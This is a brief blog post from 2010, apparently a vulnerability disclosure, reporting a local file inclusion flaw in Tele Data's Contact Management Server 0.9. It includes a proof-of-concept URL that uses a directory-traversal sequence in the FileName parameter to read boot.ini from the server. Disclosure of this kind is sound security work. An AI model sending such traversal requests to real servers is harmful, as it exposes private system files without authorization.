A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read files from the server file system.
PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini
Sunday, May 23, 2010
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment